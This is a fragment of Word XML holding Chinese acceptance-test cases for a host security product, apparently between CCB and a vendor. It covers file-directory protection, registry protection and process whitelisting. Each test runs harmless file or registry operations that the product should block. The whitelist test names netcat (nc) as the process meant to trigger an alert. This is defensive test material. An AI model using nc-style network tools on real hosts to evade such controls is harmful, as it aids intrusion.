              <w:t>测试记录</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7634"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仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7634" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="72"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>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仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7634"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rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>人员签字</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7634" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>建行：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>____________________</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">        厂商：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>____________________</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="114" w:name="_Toc1388"/>
      <w:bookmarkStart w:id="115" w:name="_Toc600863050"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:t>文件目录保护</w:t>
      </w:r>
      <w:bookmarkEnd w:id="114"/>
      <w:bookmarkEnd w:id="115"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="28"/>
        <w:tblW w:w="90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7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案例编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>文件目录保护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测试目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>支持对文件和目录的防护；同时支持自定义目录禁止对指定位置文件的操作，包括文件创建、删除、读取等行为；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预置条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="54"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Windows server2012主机上创建c:\test，在c:\test目录下创建a.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="54"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Oracle-76-01上创建目录/tmp/test/，并且在目录下创建a.php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测试拓扑：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>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测试方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="55"/>
              </w:numPr>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在服务端设置Windows server2012保护的目录为c:\test；</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="55"/>
              </w:numPr>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开启阻断模式，在Windows server2012的c:\test目录下操作打开a.txt、创建b.txt、删除a.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="55"/>
              </w:numPr>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设置Oracle-76-01保护目录为/tmp/test/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="55"/>
              </w:numPr>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开启阻断模式，在Oracle-76-01的/tmp/test/目录下进行vi a.php、touch b.php、rm -f a.php文件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预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>结果1（步骤1-2）：无法打开a.txt，无法创建b.txt，无法删除a.txt；并且在服务端上可以看到</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Windows server2012系统c:\test目录下创建、删除、读取文件被拦截的告警</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>结果2（步骤3-4）：无法打开a.php，无法创建b.php，无法删除a.php,在服务端上可以看到</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Oracle-76-01上/tmp/test/目录下的创建、删除、读取文件的操作</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>被拦截的告警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测试工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="777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测试记录</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="777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测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="72"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>支持Windows</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t xml:space="preserve">             </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>口 通过   口 未通过  口 未测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="72"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t xml:space="preserve">支持Linux    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t xml:space="preserve">              </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>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备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="777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rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>人员签字</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>建行：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>____________________</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">        厂商：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>____________________</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="116" w:name="_Toc32103"/>
      <w:bookmarkStart w:id="117" w:name="_Toc1237173156"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:t>注册表保护</w:t>
      </w:r>
      <w:bookmarkEnd w:id="116"/>
      <w:bookmarkEnd w:id="117"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="28"/>
        <w:tblW w:w="90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7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案例编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>注册表保护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测试目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>支持注册表防护，同时支持自定义防护规则，包括注册表项的删除、创建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预置条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"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测试拓扑：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>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测试方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="56"/>
              </w:numPr>
              <w:jc w:val="left"/>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先执行Win+r,然后输入regedit回车</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="56"/>
              </w:numPr>
              <w:jc w:val="left"/>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Windows测试主机上的注册表路径HKEY_USERS\S-1-5-20创建注册表项为test</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="56"/>
              </w:numPr>
              <w:jc w:val="left"/>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在服务端设置对HKEY_USERS\S-1-5-20\test注册表的保护，禁止注册表项的创建和删除</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="56"/>
              </w:numPr>
              <w:jc w:val="left"/>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在HKEY_USERS\S-1-5-20\test路径下进行创建表项abc</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="56"/>
              </w:numPr>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>在HKEY_USERS\S-1-5-20\路径下删除test注册表项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预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>结果1：创建abc、删除test操作被拦截，并且在服务端上可以看到相应操作被拦截的告警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测试工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="777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测试记录</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="777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测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="72"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t xml:space="preserve">支持防护注册表项的创建  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t xml:space="preserve">             </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>口 通过   口 未通过  口 未测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="72"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t xml:space="preserve">支持防护注册表项的删除  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t xml:space="preserve">             </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>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备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="777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rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>人员签字</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>建行：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>____________________</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">        厂商：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>____________________</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="118" w:name="_Toc32338"/>
      <w:bookmarkStart w:id="119" w:name="_Toc1232562638"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:t>进程白名单</w:t>
      </w:r>
      <w:bookmarkEnd w:id="118"/>
      <w:bookmarkEnd w:id="119"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="28"/>
        <w:tblW w:w="90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1"/>
        <w:gridCol w:w="7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案例编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7966" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>进程白名单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tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>测试目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7966" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>通过添加进程白名单，对非白名单进程的启动进行告警，可对系统进程自动添加至白名单。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预置条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7966" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>测试主机上有安装nc命令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tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>测试拓扑：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7966" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>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tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>测试方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7966" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="57"/>
              </w:numPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>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选择对应的服务器redhat-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>67</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
